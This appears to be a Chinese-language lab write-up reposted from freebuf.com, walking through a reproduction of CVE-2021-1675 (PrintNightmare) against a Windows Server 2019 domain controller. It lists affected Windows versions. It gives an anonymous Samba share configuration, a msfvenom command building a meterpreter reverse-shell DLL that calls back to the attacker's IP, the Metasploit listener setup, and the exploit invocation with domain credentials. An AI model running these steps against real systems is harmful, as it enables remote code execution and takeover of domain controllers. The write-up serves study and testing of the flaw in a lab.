微软漏洞 Cve-2021-1675复现 – 作者:zcczcc

受影响版本

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 32-bit Systems Service Pack 2

  • Windows RT 8.1

  • Windows 8.1 for x64-based systems

  • Windows 8.1 32-bit systems

  • Windows 7 for x64-based Systems Service Pack 1

  • Windows 7 32-bit Systems Service Pack 1

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows 10 Version 1607 for x64-based Systems

  • Windows 10 Version 1607 32-bit Systems

  • Windows 10 for x64-based Systems

  • Windows 10 32-bit Systems

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows 10 Version 20H2 for ARM64-based Systems

  • Windows 10 Version 20H2 32-bit Systems

  • Windows 10 Version 20H2 for x64-based Systems

  • Windows Server, version 2004 (Server Core installation)

  • Windows 10 Version 2004 for x64-based Systems

  • Windows 10 Version 2004 for ARM64-based Systems

  • Windows 10 Version 2004 32-bit Systems

  • Windows 10 Version 21H1 32-bit Systems

  • Windows 10 Version 21H1 for ARM64-based Systems

  • Windows 10 Version 21H1 for x64-based Systems

  • Windows Server, version 1909 (Server Core installation)

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 32-bit Systems

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows 10 Version 1809 for ARM64-based Systems

  • Windows 10 Version 1809 for x64-based Systems

  • Windows 10 Version 1809 32-bit Systems

准备环境:kali:192.168.173.133
域控:Windows 2019 192.168.173.139(必须是2019或者2016)

首先,创建一个域控(创建域控步骤忽略):

image-20210707094453699

创建一个普通域用户:

image-20210707094553986

image-20210707094706837

image-20210707094801801

图片[5]-微软漏洞 Cve-2021-1675复现 – 作者:zcczcc-安全小百科

image-20210707095051569

Windows机默认都是开启print Spooler服务的,不然无法实现打印;

图片[7]-微软漏洞 Cve-2021-1675复现 – 作者:zcczcc-安全小百科

1.先把作者的impacket包下载下来运行,链接为

https://github.com/cube0x0/impacket

image-20210707095550273

运行

cd impacket
python3 ./setup.py install

image-20210707095711642

2.开启匿名访问smb

2.1 配置/etc/samba/smb.conf
这里我使用原作者的也不行,后面参考了Gamma实验室公众号的配置才可以成功访问,链接在此:https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ

image-20210707095855643

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

配置完后,启动smbd

sudo service smbd start

因为spoolsv.exe是x64的,所以生成的dll也得是x64,生成dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.133 LPORT=7893 -f dll -o /tmp/rever.dll

图片[11]-微软漏洞 Cve-2021-1675复现 – 作者:zcczcc-安全小百科

开启监听

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.173.133
set lport 7893
run

image-20210707100739654

exp链接:

https://github.com/cube0x0/CVE-2021-1675

image-20210707101025031

直接上exp

python3 CVE-2021-1675.py 域名/域普通用户名:用户密码@域控IP smb共享文件的路径

图片[14]-微软漏洞 Cve-2021-1675复现 – 作者:zcczcc-安全小百科

image-20210707105839799

image-20210707105002953

最后一步这里我出现了一个玄学问题,一直上不了线,哪怕是拿师兄能够上线的虚拟机环境拷贝到我电脑上也不行,所以这里就让他截了个图。。周末重装系统去,这种情况不是第一次了,重装系统解决100%的问题。

来源:freebuf.com 2021-07-07 12:11:14 by: zcczcc

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论